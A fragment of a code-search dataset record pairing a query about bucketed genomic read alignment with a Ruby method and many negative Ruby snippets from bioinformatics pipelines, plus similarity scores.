'w') do |f|\n f.puts_header\n f.puts(entries, progress_bar: true, id_prefix: @id_prefix)\n end\n \n @output_file\n end",
"def do_ild(block1, block2)\n\n total_length = block1[0][:seq].length() + block2[0][:seq].length()\n ildstring = \"\"\n ildstring << \"nstates prot;\\n\"\n ildstring << \"xread\\n\"\n ildstring << \"#{total_length} 49\\n\"\n ildstring << \"\\n\"\n ildstring << \"&[prot]\\n\"\n block1.each { |b1| ildstring << \"#{b1[:genus]} #{b1[:seq]}\\n\" }\n ildstring << \"\\n\"\n ildstring << \"&[prot]\\n\"\n block2.each { |b2| ildstring << \"#{b2[:genus]} #{b2[:seq]}\\n\" }\n\n ildfile = Tempfile.new(['ildinput','.tnt'])\n File.open(ildfile.path,'w') { |f| f.write(ildstring) }\n `sequences/aligned/tnt.command mxram 2000, sect:slack 35, p #{ildfile.path}, ild, zzz`\n puts \"p-value?\"\n pval = gets.chomp()\n return pval\n\nend",
"def validation_submission(params)\n\n possible_errors = Array.new\n\n aa_seq_array = is_sequence_empty(params[:aa_sequence], params[:aa_fasta])\n puts \"aa_seq_array => #{aa_seq_array}\"\n # if user submit more than 20 sequence at time, return error immediately\n if !aa_seq_array.nil? and aa_seq_array.length > 20\n possible_errors << \"You submitted more than 20 amino acid sequences. While, we only accept 20 amino acid sequences or less per submission.\"\n return possible_errors\n end\n\n nt_seq_array = is_sequence_empty(params[:nt_sequence], params[:nt_fasta])\n puts \"nt_seq_array => #{nt_seq_array}\"\n if !nt_seq_array.nil? and nt_seq_array.length > 20\n possible_errors << \"You submitted more than 20 nucleotide sequences. While, we only accept 20 nucleotide sequences or less per submission.\"\n return possible_errors\n end\n\n\n if aa_seq_array.nil? or nt_seq_array.nil?\n possible_errors << \"Either your amino acid sequence or nucleotide sequence are empty\"\n return possible_errors\n end\n\n # Check aa sequence \n aa_sequence_hash = Hash.new\n header_array = Array.new\n accession_no_array = Array.new\n invalid_definition = \"\"\n invalid_sequence = \"\"\n aa_seq_array.each do |fasta_sequence|\n query = Bio::FastaFormat.new( fasta_sequence )\n aa_sequence_definition = parse_definition(query.definition)\n\n aa_sequence = validate_seq(query.to_seq.seq,\"aa\") # fail return nil; success return 0\n # puts \"validation aa_sequence => #{aa_sequence}\"\n if aa_sequence_definition.nil?\n invalid_definition += \"#{query.definition}\\n\"\n end\n\n if aa_sequence.nil?\n invalid_sequence += \"#{query.definition}\\n\"\n end\n\n if !aa_sequence_definition.nil? and !aa_sequence.nil?\n aa_sequence_hash[aa_sequence_definition[0]] = query.to_seq.seq\n\n header_array << aa_sequence_definition[0].strip\n accession_no_array << aa_sequence_definition[1].strip\n end\n \n end\n \n if invalid_definition.length > 0 or invalid_sequence.length > 0\n # something wrong with aa sequence field\n invalid_submission_msg = \"Your following amino acid sequences are not following our submission rules\\n\"\n if invalid_definition.length > 0\n invalid_submission_msg += \"Failed fasta format:\\n #{invalid_definition}\"\n end\n if invalid_sequence.length > 0\n invalid_submission_msg += \"Failed amino acid sequence:\\n #{invalid_sequence}\"\n end\n\n possible_errors << invalid_submission_msg\n\n return possible_errors\n\n end\n\n # check uniqueness of header\n duplicate_header = check_uniqueness_of_header(header_array)\n if duplicate_header.length != 0\n invalid_submission_msg = \"Your following amino acid sequences have duplicate header:\\n\"\n duplicate_header.each do |d_header|\n invalid_submission_msg += \"#{d_header}\\n\"\n end\n\n possible_errors << invalid_submission_msg\n \n return possible_errors\n end\n\n # check if the accession number is validate or not\n # we only check the correctness of aa accession number; not gene; since we only care one accession number\n invalid_accession_num = validate_accession_numbers(accession_no_array, \"aa\")\n if invalid_accession_num.length != 0\n invalid_submission_msg = \"Your following amino acid sequences have invalid accession number from NCBI. 
Please check NCBI protein database:<br>\"\n invalid_accession_num.each do |accession_no|\n invalid_submission_msg += \"#{accession_no}<br>\"\n end\n\n possible_errors << invalid_submission_msg\n \n return possible_errors\n end\n\n ########################################################################################\n # Check nt sequence\n nt_sequence_hash = Hash.new\n header_array = Array.new\n accession_no_array = Array.new\n invalid_definition = \"\"\n invalid_sequence = \"\"\n nt_seq_array.each do |fasta_sequence|\n query = Bio::FastaFormat.new( fasta_sequence )\n nt_sequence_definition = parse_definition(query.definition)\n nt_sequence = validate_seq(query.to_seq.seq,\"nt\")\n \n # puts \"validation nt_sequence => #{nt_sequence}\"\n if nt_sequence_definition.nil?\n invalid_definition += \"#{query.definition}\\n\"\n end\n\n if nt_sequence.nil?\n invalid_sequence += \"#{query.definition}\\n\"\n end\n\n if !nt_sequence_definition.nil? and !nt_sequence.nil?\n nt_sequence_hash[nt_sequence_definition[0]] = query.to_seq.seq\n\n header_array << nt_sequence_definition[0].strip\n accession_no_array << nt_sequence_definition[1].strip\n end\n end\n\n if invalid_definition.length > 0 or invalid_sequence.length > 0\n # something wrong with aa sequence field\n invalid_submission_msg = \"Your following nucleotide sequences are not following our submission rules\"\n if invalid_definition.length > 0\n invalid_submission_msg += \"Failed fasta format:\\n #{invalid_definition}\"\n end\n if invalid_sequence.length > 0\n invalid_submission_msg += \"Failed nucleotide sequence:\\n #{invalid_sequence}\"\n end\n\n possible_errors << invalid_submission_msg\n return possible_errors\n end\n \n duplicate_header = check_uniqueness_of_header(header_array)\n if duplicate_header.length != 0\n invalid_submission_msg = \"Your following nucleotide sequences have duplicate header:\\n\"\n duplicate_header.each do |d_header|\n invalid_submission_msg += \"#{d_header}\\n\"\n end\n \n possible_errors << invalid_submission_msg\n \n return possible_errors\n end\n\n invalid_accession_num = validate_accession_numbers(accession_no_array, \"nt\")\n if invalid_accession_num.length != 0\n invalid_submission_msg = \"Your following nucleotide sequences have invalid accession number from NCBI. 
Please check NCBI protein database:<br>\"\n invalid_accession_num.each do |accession_no|\n invalid_submission_msg += \"#{accession_no}<br>\"\n end\n\n possible_errors << invalid_submission_msg\n \n return possible_errors\n end\n\n\n\n # check missing sequence\n missing_aa_sequence, missing_nt_sequence = check_matchness(aa_sequence_hash,nt_sequence_hash)\n # puts \"missing_aa_sequence => #{missing_aa_sequence}\"\n # puts \"missing_nt_sequence => #{missing_nt_sequence}\"\n missing_seq_string = \"\"\n if missing_aa_sequence.length > 0\n missing_seq_string += \"You are missing following amino acid sequence based on your nucleotide sequence:\\n\"\n missing_aa_sequence.each do |aa_seq_name|\n missing_seq_string += \"#{aa_seq_name}\\n\"\n end\n end\n\n if missing_nt_sequence.length > 0\n missing_seq_string += \"You are missing following nucleotide sequence based on your amino acid sequence:\\n\"\n missing_nt_sequence.each do |nt_seq_name|\n missing_seq_string += \"#{nt_seq_name}\\n\"\n end\n end\n\n if missing_seq_string.length > 0\n possible_errors << missing_seq_string\n end\n\n\n\n # if error, return error\n # else, return aa_array and nt_array \n if possible_errors.length > 0\n return possible_errors\n else\n aa_nt_array = Hash.new\n aa_nt_array[\"aa\"] = aa_seq_array\n aa_nt_array[\"nt\"] = nt_seq_array\n return aa_nt_array\n end\n\n end",
"def find_replicates(params)\n unless ( params[:geoid_string].nil? ^ params[:geoid_file].nil?) then\n fr_puts \"Received both a :geoid_string and :geoid_file parameter--exactly one is required! Aborting!\"\n throw :needs_exactly_one_geoid_string_or_file\n end\n @batchmode = ! params[:geoid_file].nil?\n # If running in batch, set up the file to get geoids from\n if @batchmode then\n f = File.new(params[:geoid_file])\n else\n f = [params[:geoid_string]]\n end \n output_basedir = Dir.new(params[:output_dir])\n # This ought to be a constant\n no_db_commits = params[:no_db_commits]\n @calling_command = params[:calling_command]\n\n all_infos = [] # All info hashs discovered \n # Only save list of marshalled infos if in batchmode\n marshal_list = File.new(File.join(output_basedir.path, \"marshal_list.txt\"), \"w\") if @batchmode\n \n # For each line in the file (or the single array entry)\n # figure out what the geoids ought to be and stick them in a hash\n f.each { |line|\n line.chomp!\n (pid, gse, gsms, target_column, sdrf) = line.split(/\\t/)\n gsms = gsms.split(/,/)\n \n info = {} # Hash containing calculated geoid information\n info[:pid] = pid\n\n header = parse_sdrf(sdrf)\n s = header.reverse\n\n fr_puts \"modencode_#{pid} has #{gsms.size.inspect} GSMs\" \n fr_puts \"and we have #{header[0].rows.inspect} rows\"\n\n if gsms.size != header[0].rows then\n raise Exception.new(\"Must supply as many GSMS as rows! SDRF has #{header[0].rows} rows, but received #{gsms.size} GSMS.\")\n end\n\n column_specified = false\n target_column = target_column.to_i\n \n colname = header[target_column].name\n if colname =~ /geo/i then\n fr_puts \"Using existing GEOid column #{colname}\"\n else\n fr_puts \"Using protocol #{header[target_column].split_example}.\"\n column_specified = true\n end\n\n # if it's not geo, use it as protocol:\n if( column_specified ) then \n \n # get previous_protocol (ie target) and the one after it\n previous_protocol = header[target_column]\n previous_protocol_name = previous_protocol.split_example unless previous_protocol.nil?\n next_protocol = header.slice(target_column +1, header.length).find{|col| col.heading =~ /Protocol REF/i}\n next_protocol_name = next_protocol.split_example unless next_protocol.nil?\n\n\n geo_record = SDRFHeader.new(\"Result Value\", \"geo record\") # make a new column\n # populate the geo record\n gsms.each_index{|i|\n geo_record.values[i] = gsms[i]\n }\n fr_puts \" Setting GSMs to: \" + geo_record.values.join(\", \") \n i = next_protocol.nil? ? 
header.size : header.find_index(next_protocol)\n header.insert(i, geo_record)\n fr_puts \" Attach GEO IDs to protocol: '#{previous_protocol.to_s}'\" \n else # there must be a geo colunn\n\n # finding a geo header index.\n geo_header_idx = s.find_index { |h| h.name =~ /geo/i }\n\n if geo_header_idx then\n previous_protocol = s.slice(geo_header_idx, s.length).find { |col| col.heading =~ /Protocol REF/i }; previous_protocol_name = previous_protocol.split_example unless previous_protocol.nil?\n next_protocol = s.slice(0, geo_header_idx).reverse.find { |col| col.heading =~ /Protocol REF/i }; next_protocol_name = next_protocol.split_example unless next_protocol.nil?\n # Attach GEO IDs to existing GEO ID column\n fr_puts \" Found existing GEO ID column for #{pid} between: '#{previous_protocol_name.to_s}' AND '#{next_protocol_name.to_s}'\" \n sdrf_rows = s[geo_header_idx].rows\n geo_header_col = s[geo_header_idx]\n\n if sdrf_rows != gsms.size then\n raise Exception.new(\"Can't match #{sdrf_rows} SDRF rows to #{gsms.size} GEO ids!\")\n \n ## Attach GEO IDs, lining up duplicates with the previous row in the SDRF with the appropriate number of unique values\n #fr_puts \" There are more rows in the SDRF than GSM IDs: #{sdrf_rows} != #{gsms.size}.\" \n # Have to line this up carefully\n #uniq_rows = enough_replicates_at.uniq_rows\n #fr_puts \" Unique rows for #{enough_replicates_at.heading} [#{enough_replicates_at.name}]: \" + uniq_rows.pretty_inspect \n #geo_header_col.values.clear\n #uniq_rows.each_index { |is_idx|\n # uniq_rows[is_idx].each { |i|\n # geo_header_col.values[i] = gsms[is_idx]\n # }\n #}\n #fr_puts \" Setting GSMs to: \" + geo_header_col.values.join(\", \") \n else\n # Attach GEO IDs to the SDRF in order\n geo_header_col.values.clear\n gsms.each_index { |i|\n geo_header_col.values[i] = gsms[i]\n }\n fr_puts \" Setting GSMs to: \" + geo_header_col.values.join(\", \") \n end\n geo_record = geo_header_col\n else # No protocol column and no geo header idx. should never happen.\n raise Exception.new(\"No protocol column or existing GEO column was specified. This should never happen!\")\n end\n end\n\n # If batchmode, make the project's subfolder within out\n output_sdrfdir = @batchmode ? File.join(output_basedir.path, pid.to_s) : output_basedir.path \n FileUtils.mkdir_p(output_sdrfdir)\n out_sdrf = File.join(output_sdrfdir, File.basename(sdrf))\n\n # Create new SDRF, overwriting existing sdrf only if not in batchmode\n print_sdrf(header, out_sdrf, !@batchmode)\n\n info[:geo_header_col] = geo_header_col\n info[:geo_record] = geo_record\n info[:previous_protocol_name] = previous_protocol_name\n\n # stick info in the hash to be remembered\n all_infos << info\n # Write a marshal file\n marshal_filename = GEOID_MARSHAL\n out_marshal = File.join(output_sdrfdir, marshal_filename) \n marshal_file = File.new(out_marshal, \"w\")\n marshal_file.puts(Marshal.dump(info))\n marshal_file.close\n \n marshal_list.puts File.join(pid.to_s, marshal_filename) if @batchmode \n \n } \n \n marshal_list.close if @batchmode\n \n # Then, run the database stuff on all_infos\n attached_geoids = update_db(all_infos, no_db_commits)\n attached_geoids\n end"
] |
[
"0.6870922",
"0.64567596",
"0.6185963",
"0.601857",
"0.5963206",
"0.59329545",
"0.5902964",
"0.58885527",
"0.5840516",
"0.5804533",
"0.57673323",
"0.5726356",
"0.57167673",
"0.5711429",
"0.5706999",
"0.56836855",
"0.5670119",
"0.56245196",
"0.5620191",
"0.56082445",
"0.5604751",
"0.55904263",
"0.5559772",
"0.555126",
"0.5546442",
"0.55460584",
"0.5536094",
"0.5511573",
"0.5477689",
"0.544464",
"0.54142714",
"0.5352776",
"0.531028",
"0.5303957",
"0.5297002",
"0.5280983",
"0.524484",
"0.52319235",
"0.5226835",
"0.5218394",
"0.52059186",
"0.5150769",
"0.514313",
"0.5119421",
"0.5111732",
"0.51100534",
"0.50980854",
"0.5096465",
"0.50856876",
"0.5043662",
"0.50259215",
"0.50234497",
"0.50195396",
"0.50139624",
"0.5005188",
"0.5001924",
"0.4991363",
"0.49864432",
"0.49804854",
"0.49804854",
"0.4974494",
"0.49677533",
"0.49669087",
"0.4960447",
"0.494649",
"0.49378258",
"0.49326998",
"0.49320856",
"0.4925928",
"0.49226964",
"0.4918998",
"0.4918828",
"0.49175927",
"0.49171984",
"0.49063405",
"0.49044597",
"0.49021482",
"0.489316",
"0.48779386",
"0.4864052",
"0.486145",
"0.48598382",
"0.48450837",
"0.48439533",
"0.48411447",
"0.48356745",
"0.48318473",
"0.48272744",
"0.4819107",
"0.48141918",
"0.48059893",
"0.4805737",
"0.47975928",
"0.47950804",
"0.479042",
"0.47844592",
"0.47630545",
"0.4757485",
"0.474794",
"0.4747441"
] |
0.47745046
|
96
|
Performs genomic alignment with relative error rate (buckets)
|
def bucketized_alignment
# split reads into buckets according to their size and err_rate
@buckets = bucketize(@err_rate)
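    # each bucket built by bucketize is a [lower_len, upper_len, mismatches]
    # triple, where mismatches = (lower_len * err_rate).floor (see bucketize);
    # e.g. at err_rate = 0.05, reads of length 20..39 are aligned allowing
    # 1 mismatch, and reads of length 40..59 allowing 2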
# perform alignment on each bucket
@buckets.reverse_each do |lower, upper, mismatches|
@names.set_bucket(lower, upper)
mapped, unmapped = align(
@ref, @ref_base, @software,
{ annotation: @annotation,
tophat_aligner: @tophat_aligner,
mismatches: mismatches
}
)
@mapped_bams << mapped
@unmapped_bams << unmapped
@max_mismatches = [@max_mismatches, mismatches].max
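    # keep the loosest (largest) mismatch setting seen across buckets;
    # presumably consumed by later steps that post-process the merged BAMs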
end
# merge alignments
@names.unset_bucket
unbucketize(@mapped_bams, @names.get('mapped_merged'))
unbucketize(@unmapped_bams, @names.get('unmapped_merged'))
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def compute\n index(@ref, @ref_base, @software, @annotation)\n\n if @err_rate > 0\n bucketized_alignment\n else # software == :star || err_rate == 0\n unbucketized_alignment\n end\n end",
"def genome(liszt)\n=begin\n[samopen] SAM header is present: 2 sequences\n7621912 reads; of these:\n 4009241 (52.60%) were paired; of these:\n 1983557 (49.47%) aligned concordantly 0 times\n 1818685 (45.36%) aligned concordantly exactly 1 time\n 206999 (5.16%) aligned concordantly >1 times\n ----\n 1983557 pairs aligned concordantly 0 times; of these:\n 409503 (20.64%) aligned discordantly 1 time\n ----\n 1574054 pairs aligned 0 times concordantly or discordantly; of these:\n 3148108 mates make up the pairs; of these:\n 1009275 (32.06%) aligned 0 times\n 35392 (1.12%) aligned exactly 1 time\n 2103441 (66.82%) aligned >1 times\n 3612671 (47.40%) were unpaired; of these:\n 498719 (13.80%) aligned 0 times\n 2246121 (62.17%) aligned exactly 1 time\n 867831 (24.02%) aligned >1 times\n=end\n #puts(liszt);exit\n dict={}; liszt.shift\n dict[\"total\"]=liszt.shift.split[0]; #liszt.shift\n dict[\"paired\"]=liszt.shift.split[0]; liszt.shift #conc 0\n dict[\"conc_once\"]=liszt.shift.split[0]\n dict[\"conc_mult\"]=liszt.shift.split[0]\n liszt.shift(2); dict[\"disc_once\"]=\"\"; dict[\"disc_mult\"]=\"\"\n line=liszt.shift\n line.include?(\">1 times\") ? dict[\"disc_mult\"]=line.split[0] : dict[\"disc_once\"]=line.split[0]\n liszt.shift\n dict[\"unaligned_pairs\"]=liszt.shift.split[0]\n liszt.shift\n dict[\"unmates\"]=liszt.shift.split[0] #unaligned mates\n dict[\"mate_once\"]=liszt.shift.split[0]\n dict[\"mate_mult\"]=liszt.shift.split[0]\n dict[\"unpaired\"]=liszt.shift.split[0]\n dict[\"unpair_unaligned\"]=liszt.shift.split[0]\n dict[\"unpair_once\"]=liszt.shift.split[0]\n dict[\"unpair_mult\"]=liszt.shift.split[0]\n dict\nend",
"def unbucketized_alignment\n align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: @mismatches\n }\n )\n mapped_all = @software == :star ? \\\n @names.get('mapped_all_star') : @names.get('mapped_all')\n run_cmd(\"cp #{mapped_all} #{@names.get('mapped_merged')}\")\n unless @software == :star\n run_cmd(\n \"cp #{@names.get('unmapped')} #{@names.get('unmapped_merged')}\"\n )\n end\n @max_mismatches = @mismatches\n end",
"def gags(options={})\n min_disagreeing_proportion = options[:min_disagreeing_proportion]\n min_disagreeing_proportion ||= 0.1\n min_disagreeing_absolute = options[:min_disagreeing_absolute]\n min_disagreeing_absolute ||= 3\n \n options[:acceptable_gag_errors] ||= DEFAULT_GAG_ERROR_CONTEXTS\n \n log = Bio::Log::LoggerPlus['bio-gag']\n \n piles = []\n gags = []\n \n each do |pile|\n options[:progressbar].inc unless options[:progressbar].nil?\n \n if piles.length < 2\n #log.debug \"Piles cache for this reference sequence less than length 2\"\n piles = [piles, pile].flatten\n next\n elsif piles.length < 3\n #log.debug \"Piles cache for this reference sequence becoming full\"\n piles = [piles, pile].flatten\n elsif piles[1].ref_name != pile.ref_name\n #log.debug \"Piles cache removed - moving to new contig\"\n piles = [pile]\n next\n else\n #log.debug \"Piles cache regular push through\"\n piles = [piles[1], piles[2], pile].flatten\n end\n log.debug \"Current piles now at #{piles[0].ref_name}, #{piles.collect{|pile| \"#{pile.pos}/#{pile.ref_base}\"}.join(', ')}\" if log.debug?\n \n # if not at the start/end of the contig\n first = piles[0]\n second = piles[1]\n third = piles[2]\n \n # Require particular sequences in the reference sequence\n ref_bases = \"#{first.ref_base.upcase}#{second.ref_base.upcase}#{third.ref_base.upcase}\"\n index = options[:acceptable_gag_errors].index(ref_bases)\n if index.nil?\n log.debug \"Sequence #{ref_bases} does not match whitelist, so not calling a gag\" if log.debug?\n next\n end\n gag_sequence = options[:acceptable_gag_errors][index]\n \n # all reads that have a single insertion after the first or second position, but not both \n inserting_reads = [first.reads, second.reads].flatten.uniq.select do |read|\n !(read.insertions[first.pos] and read.insertions[second.pos]) and\n (read.insertions[first.pos] or read.insertions[second.pos])\n end\n log.debug \"Inserting reads after filtering: #{inserting_reads.inspect}\" if log.debug?\n \n # ignore regions that aren't ever going to make it past the next filter\n if inserting_reads.length < min_disagreeing_absolute or inserting_reads.length.to_f/first.coverage < min_disagreeing_proportion\n log.debug \"Insufficient disagreement at step 1, so not calling a gag\" if log.debug?\n next\n end\n\n # what is the maximal base that is inserted and maximal number of directions\n direction_counts = {'+' => 0, '-' => 0}\n base_counts = {}\n inserting_reads.each do |read|\n insert = read.insertions[first.pos]\n insert ||= read.insertions[second.pos]\n insert.upcase!\n direction_counts[read.direction] += 1\n base_counts[insert] ||= 0\n base_counts[insert] += 1\n end\n log.debug \"Direction counts of insertions: #{direction_counts.inspect}\" if log.debug?\n log.debug \"Base counts of insertions: #{base_counts.inspect}\" if log.debug?\n max_direction = direction_counts['+']>direction_counts['-'] ? 
'+' : '-'\n max_base = base_counts.max do |a,b|\n a[1] <=> b[1]\n end[0]\n log.debug \"Picking max direction #{max_direction} and max base #{max_base}\" if log.debug?\n \n # Only accept positions that are inserting a single base\n if max_base.length > 1\n log.debug \"Maximal insertion is too long, so not calling a gag\" if log.debug?\n next\n end\n \n counted_inserts = inserting_reads.select do |read|\n insert = read.insertions[first.pos]\n insert ||= read.insertions[second.pos]\n insert.upcase!\n if read.direction == max_direction and insert == max_base\n # Remove reads that don't match the first and third bases like the consensus sequence\n read.sequence[read.sequence.length-1] == third.ref_base and\n read.sequence[read.sequence.length-3] == first.ref_base\n else\n false\n end\n end\n log.debug \"Reads counting after final filtering: #{counted_inserts.inspect}\" if log.debug?\n \n coverage = (first.coverage+second.coverage+third.coverage).to_f / 3.0\n coverage_percent = counted_inserts.length.to_f / coverage\n log.debug \"Final abundance calculations: max base #{max_base} (comparison base #{second.ref_base.upcase}) occurs #{counted_inserts.length} times compared to coverage #{coverage} (#{coverage_percent*10}%)\" if log.debug?\n if max_base != second.ref_base.upcase or # first and second bases must be the same \n counted_inserts.length < min_disagreeing_absolute or # require 3 bases in that maximal direction\n coverage_percent < min_disagreeing_proportion # at least 10% of reads with disagree with the consensus and agree with the gag\n log.debug \"Failed final abundance cutoffs, so not calling a gag\" if log.debug?\n next\n end\n \n # alright, gamut navigated. We have a match, record it\n gag = Bio::Gag.new(second.pos, piles, first.ref_name)\n gags.push gag\n log.debug \"Yielding gag #{gag.inspect}\"\n yield gag if block_given?\n end\n \n return gags\n end",
"def process_alignment\n # init vars\n @names = []\n @seqs = []\n \n @alignment = \"-B #{@basename}.aln\"\n\n # import alignment file\n @content = IO.readlines(@infile).map {|line| line.chomp}\n \n #check alignment for gap-only columns\n remove_inserts\n \n #write query-file\n File.open(@infile, \"w\") do |file|\n file.write(\">#{@names[0]}\\n\")\n file.write(\"#{@seqs[0]}\\n\")\n end\n \n #write aln-file\n File.open(@basename + \".aln\", \"w\") do |file|\n @names.each_index do |num|\n file.write(\"Sequence#{num} \")\n file.write(\" \") if (num < 10)\n file.write(\" \") if (num < 100)\n file.write(\"#{@seqs[num]}\\n\")\n end\n end\n end",
"def a3g_hypermut_seq_hash(seq_hash)\n #mut_hash number of apobec3g/f mutations per sequence\n mut_hash = {}\n hm_hash = {}\n out_hash = {}\n\n #total G->A mutations at apobec3g/f positions.\n total = 0\n\n #make specimen consensus\n ref = consensus_without_alignment(seq_hash.values)\n\n #obtain apobec3g positions and control positions\n apobec = apobec3gf(ref)\n mut = apobec[0]\n control = apobec[1]\n\n seq_hash.each do |k,v|\n a = 0 #muts\n b = 0 #potential mut sites\n c = 0 #control muts\n d = 0 #potenrial controls\n mut.each do |n|\n next if v[n] == \"-\"\n if v[n] == \"A\"\n a += 1\n b += 1\n else\n b += 1\n end\n end\n mut_hash[k] = a\n total += a\n\n control.each do |n|\n next if v[n] == \"-\"\n if v[n] == \"A\"\n c += 1\n d += 1\n else\n d += 1\n end\n end\n rr = (a/b.to_f)/(c/d.to_f)\n\n t1 = b - a\n t2 = d - c\n\n fet = Rubystats::FishersExactTest.new\n fisher = fet.calculate(t1,t2,a,c)\n perc = fisher[:twotail]\n info = k + \",\" + a.to_s + \",\" + b.to_s + \",\" + c.to_s + \",\" + d.to_s + \",\" + rr.round(2).to_s + \",\" + perc.to_s\n out_hash[k] = info\n if perc < 0.05\n hm_hash[k] = info\n end\n end\n\n if seq_hash.size > 20\n rate = total.to_f/(seq_hash.size)\n\n count_mut = count(mut_hash.values)\n maxi_count = count_mut.values.max\n\n poisson_hash = poisson_distribution(rate,maxi_count)\n\n cut_off = 0\n poisson_hash.each do |k,v|\n cal = seq_hash.size * v\n obs = count_mut[k]\n if obs >= 20 * cal\n cut_off = k\n break\n elsif k == maxi_count\n cut_off = maxi_count\n end\n end\n\n mut_hash.each do |k,v|\n if v > cut_off\n hm_hash[k] = out_hash[k]\n end\n end\n end\n\n hm_seq_hash = {}\n hm_hash.keys.each do |k|\n hm_seq_hash[k] = seq_hash[k]\n end\n return [hm_seq_hash,hm_hash]\nend",
"def bucketize(error_rate)\n buckets = []\n run_cmd(\n \"fastq-bucketize #{@names.get('fp')} #{error_rate} \" \\\n \"2> #{@names.get('buckets')}\"\n )\n\n # parse buckets and compute corresponding absolute number of errors\n File.readlines(@names.get('buckets')).each do |line|\n next if line[0] == '#' # comment\n line = line.split.map(&:to_i)\n fail if (line[0] * error_rate).floor != (line[1] * error_rate).floor\n # push [lower bound, upper bound, absolute #errors]\n buckets.push([line[0], line[1], (line[0] * error_rate).floor]) \\\n unless line[1] < 14 # TODO: implement minlen option\n end\n\n buckets\n end",
"def computeRPKM(db, experiment, sample, gene_lengths)\n\tcounts = Hash.new\n\ttotal = 0\n\tdb.query(\"SELECT gene, SUM(counts) FROM exon_counts WHERE experiment=? AND sample=? GROUP BY gene\", experiment, sample).each do |row|\n\t\tgene, count = row\n\t\tcounts[gene] = count\n\t\ttotal += count\n\tend\n\tcounts.keys.each do |gene|\n\t\tgrpkm = rpkm(counts[gene], total, gene_lengths[gene])\n\t\tdb.query(\"INSERT INTO gene_counts VALUES(?,?,?,?,?)\", experiment, sample, gene, counts[gene], grpkm)\n\tend\nend",
"def exec_iter_fixed_alpha aggrStats\n iterStats = RunInfo.new\n iterConsensus = Hash.new {|hash, key| hash[key] = 0 }\n \n # NUMBER_OF_ITER times do\n $NUM_AVG_ITER.times do |i| \n # randomly withhold 20% of data\n pick_patients\n \n # find G'\n cover = exec_search \"nCOP_heruistic\"\n \n # store the stats\n iterStats.fillIn cover\n\n # add the cover to the consensus list\n add_to_consensus(iterConsensus, cover)\n end\n \n # compute the average and std for this set of iterations\n aggrStats.fillAggregateStats iterStats\n aggrStats.alpha << $ALPHA\n aggrStats.beta << $BETA\n\n # remember the frequency genes occured\n $selected_genes = iterConsensus\nend",
"def coverage\n if Experiment.find(params[:id]).uses_bam_file #return a pileup from samtools...\n\n else #return a position keyed hash of Positions objects\n features = Feature.find_in_range(params[:reference_id], params[:start], params[:end], params[:id])\n sequence = Reference.find(params[:reference_id]).sequence.sequence[params[:start].to_i - 1, (params[:end].to_i - params[:start].to_i)]\n positions = SimpleDepth.new(params[:start], params[:end], sequence, features)\n #comp_hash = {'A' => 'T', 'T' => 'A', 'G' => 'C', 'C' => 'G', 'N' => 'N'}\n #positions = Hash.new {|h,k| h[k] = {\n # '+' => {\n # 'A' => 0,\n # 'T' => 0,\n # 'G' => 0,\n # 'C' => 0,\n # 'N' => 0,\n # 'strand_total' => 0\n # },\n # '-' => {\n # 'A' => 0,\n # 'T' => 0,\n # 'G' => 0,\n # 'C' => 0,\n # 'N' => 0,\n # 'strand_total' => 0\n # },\n # 'position_total' => 0\n # }\n #}\n #positions['region_total'] = 0\n #positions['1'] = 1\n #features = Feature.find_in_range_no_overlap(params[:reference_id],params[:start],params[:end],params[:id])\n #features.each do |f|\n # if (f.sequence.match(/\\w/))\n # (f.start .. f.end - 1).each_with_index do |i, idx|\n # positions[i][f.strand][f.sequence[idx,1]] += 1\n # positions[i][f.strand]['strand_total'] += 1\n # positions[i]['position_total'] += 1\n # positions['region_total'] += 1\n # end\n # end\n end\n respond(positions)\n end",
"def run_align_assess\n filename = self.generate_fasta_alignment_file_for_all\n string = \"./lib/AlignAssess_wShorterID #{filename} P\"\n seq_array = Array.new\n if system(string)\n seq_id_array = self.sequences.map{|s| s.seq_id}\n new_filename = filename + \"_assess\"\n f = File.new(new_filename, \"r\")\n flag = false\n read_row= 999999999\n cur_row = 0\n while (line = f.gets)\n if cur_row > read_row && flag\n if line == \"\\n\"\n flag =false\n else\n seq_array << line.split(\"\\t\")\n end\n elsif line == \"Pair-wise %ID over shorter sequence:\\n\"\n flag=true\n read_row = cur_row + 2\n end\n cur_row +=1\n end\n range = seq_array.length - 1\n #seq_array.each do |row|\n for row_num in 0..range\n for i in 1..range#(row_num) \n PercentIdentity.first_or_create(:seq1_id=>seq_id_array[row_num],\n :seq2_id=>seq_id_array[i],\n :alignment_name => self.alignment_name,\n :percent_id=>seq_array[row_num][i])\n # print \"[#{row_num}:#{i-1}=>#{row[i]}],\"\n end\n #print \"\\n\"\n end\n end\n end",
"def align_global(protein)\n # Vytvoreni tabulky\n x = protein.sequence.size\n y = @genome.sequence.size\n tab = Array.new(x+1) { Array.new(y+1) }\n\n # Vyplnime prvni radek a sloupec\n for i in 0..x\n tab[i][0] = @@d * i\n end\n for j in 0..y\n tab[0][j] = @@d * j\n end\n\n for i in 1..x\n for j in 1..y\n match = tab[i-1][j-1] + match(i, j, protein)\n delete = tab[i-1][j] + @@d\n insert = tab[i][j-1] + @@d\n\n tab[i][j] = [match, delete, insert].max\n end\n end\n\n @table = tab\n value = tab[x][y]\n EvaluatedProtein.new(protein, value)\n end",
"def sequence_check_for_submission(sequence,group_hash,reversed_group_hash)\n\n result_array = Array.new\n aa_threshold = 0.9\n \n begin\n \n query = Bio::FastaFormat.new( sequence )\n query_name = query.definition\n sequence = query.to_seq\n\n existing_matched_group_exist = CustomizedProteinSequence.find_by(:chain => sequence.seq)\n if !existing_matched_group_exist.nil? # find existing sequence\n result_array << collection(query_name, \"WARN\", \"Your sequence exists in our database. Common Name: #{existing_matched_group_exist.header} \")\n return result_array\n end\n\n sequence.auto # Guess the type of sequence. Changes the class of sequence.\n query_sequence_type = sequence.seq.class == Bio::Sequence::AA ? 'protein' : 'gene'\n\n program = 'blastp'\n database = 'reductive_dehalogenase_protein'\n blast_options = get_blast_options\n\n\n blaster = Bio::Blast.local( program, \"#{Rails.root}/index/blast/#{database}\", blast_options)\n aa_report = blaster.query(sequence.seq) # sequence.seq automatically remove the \\n; possibly other wildcard\n aa_similarity = aa_report.hits().length.to_f / aa_report.db_num().to_f\n identity_with_90 = check_alignment_identity(aa_report, 90) # identity_with_90 contains all the header that share >=90% identity\n\n # group_hash => group : Array {seq_definition}\n # reversed_group_hash = seq_definition : group\n if identity_with_90.length > 0\n identified_group_at_aa_level = 